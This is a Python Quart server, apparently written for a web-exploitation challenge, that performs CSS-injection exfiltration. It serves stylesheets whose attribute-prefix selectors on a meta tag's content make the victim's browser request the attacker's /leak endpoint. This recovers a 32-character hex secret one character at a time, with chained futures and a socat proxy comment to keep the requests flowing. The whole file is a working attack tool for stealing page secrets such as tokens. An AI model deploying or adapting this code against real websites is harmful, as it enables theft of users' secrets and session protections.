from quart import Quart, request, make_response
import asyncio
from typing import Dict, List
from urllib.parse import urlparse

# you can proxy server using socat:
# socat TCP-LISTEN:8001,fork TCP4:localhost:8000
HOST1 = "http://localhost:8000"
HOST2 = "http://localhost:8001"
LEAK_LEN = 32

futures: Dict[str, List[asyncio.Future]] = {}
leaks: Dict[str, str] = {}

app = Quart(__name__, static_url_path="", static_folder=".")


@app.route("/")
def home():
    return request.base_url


def strip_path(url):
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}"


@app.route("/polling/<leak_id>/<int:n>")
async def polling(leak_id, n):
    base = strip_path(request.base_url)
    if leak_id not in futures:
        futures[leak_id] = [asyncio.Future() for _ in range(LEAK_LEN)]
        leaks[leak_id] = []
        futures[leak_id][0].set_result(None)
    if 0 <= n < LEAK_LEN:
        await futures[leak_id][n]
        pre = "".join(leaks[leak_id][:n])
        css = ""
        for c in "0123456789abcdef":
            css += f'meta[content^="{pre + c}"] {{ color: red; background: url("{base.replace(HOST1, HOST2)}/leak/{leak_id}/{pre + c}"); }}\n'
        r = await make_response(css)
        r.headers["content-type"] = "text/css"
        return r
    else:
        return "bad"


@app.route("/leak/<leak_id>/<c>")
async def leak(leak_id, c):
    if leak_id not in leaks:
        return "bad"
    leaks[leak_id] = c
    if len(c) < LEAK_LEN:
        fut = futures[leak_id][len(leaks[leak_id])]
        fut.set_result(None)
    return ""


@app.route("/leak/<leak_id>")
async def get_leak(leak_id):
    if leak_id not in leaks:
        return "bad"
    return leaks[leak_id]


@app.after_request
def add_header(r):
    r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
    r.headers["Pragma"] = "no-cache"
    r.headers["Expires"] = "0"
    r.headers["Cache-Control"] = "public, max-age=0"
    r.headers["access-control-allow-origin"] = "*"
    return r


if __name__ == "__main__":
    app.run(port=8000, debug=False)
